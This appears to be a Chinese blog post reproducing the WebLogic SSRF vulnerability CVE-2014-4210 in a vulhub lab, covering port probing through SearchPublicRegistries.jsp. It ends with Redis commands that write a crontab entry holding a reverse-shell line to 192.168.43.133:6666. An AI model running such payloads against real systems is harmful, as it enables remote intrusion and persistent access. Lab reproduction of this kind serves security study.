当前位置: 首页 > news >正文

Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】

漏洞概述:

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

漏洞形成原因:

WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicRegistries.jsp 文件。该文件允许用户输入外部 URL,但未对输入的 URL 进行严格的过滤和验证,导致攻击者可以利用此功能发起任意 HTTP 请求

影响范围:

weblogic 版本10.0.2--10.3.6

复现

1,访问7001这样就是搭建成功了

2,在url处访问ip:7001/uddiexplorer/,可查看uddiexplorer应用

3,漏洞位置存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp,在表单中随意输入内容使用burp抓包,发送到重放模块

4,可以看到数据包有一个url,我们通过更改进行测试

5, 当访问一个可用端口时,会收到一个带有状态码的错误响应。如果访问的是非HTTP协议,则会返回"did not have a valid SOAP content-type"错误。

6,当访问一个不存在的端口时,响应会显示"could not connect over HTTP to server"。

7, 我们通过命令进入容器里面获取ip地址

docker exec -it 32da04e35583 /bin/bash

netstat -tuln

8,然后通过ssrf探测端口,发现了6379,存在redis未授权, 将反弹 shell 的脚本写入目录/etc/crontab(这个目录下是一个默认自动执行的一些 crontab 定时服务命令,里面都写的是一些开启服务的命令)

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/192.168.43.133/6666 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

http://www.dtcms.com/a/193478.html

相关文章:

  • docker 学习记录
  • 可解释性AI 综述《Explainable AI for Industrial Fault Diagnosis: A Systematic Review》
  • 【Ansible基础】Ansible 核心组件深度解析:控制节点、受管节点、Inventory与Playbook
  • 表记录的检索
  • c语言 写一个五子棋
  • vuex基本介绍
  • Linux中安装samba服务
  • 滑动窗口最大值
  • @RequestParam使用场景
  • GUI图形化演示
  • 三轴云台之远程控制与通信技术篇
  • Element Plus 取消el-form-item点击触发组件,改为原生表单控件
  • ​​STC51系列单片机引脚分类与功能速查表(以STC89C52为例)​
  • java每日精进 5.15【分页实现】
  • 自学嵌入式 day 18 - 数据结构 1
  • Seata源码—3.全局事务注解扫描器的初始化一
  • Ansys Zemax | 在 MATLAB 或 Python 中使用 ZOS-API 进行光线追迹的批次处理
  • Web》》url 参数 # 、 ? 、@
  • element ui 级联列表Cascader懒加载数据回显的优雅解决方案
  • LocalDateTime类型的时间在前端页面不显示或者修改数据时因为LocalDateTime导致无法修改,解决方案
  • 会计要素+借贷分录+会计科目+账户,几个银行会计的重要概念
  • 【J2】乘法逆元
  • 将b[索引]中元素按照a中元素的值进行排序
  • C++核心编程--1 内存分区模型
  • python打卡day26
  • 如何在线免费压缩PDF文档?
  • 【MySQL】多表连接查询
  • 各个历史版本mysql/tomcat/Redis/Jdk/Apache/gitlab下载地址
  • 2024年9月电子学会等级考试五级第三题——整数分解
  • 【蓝桥杯省赛真题49】python偶数 第十五届蓝桥杯青少组Python编程省赛真题解析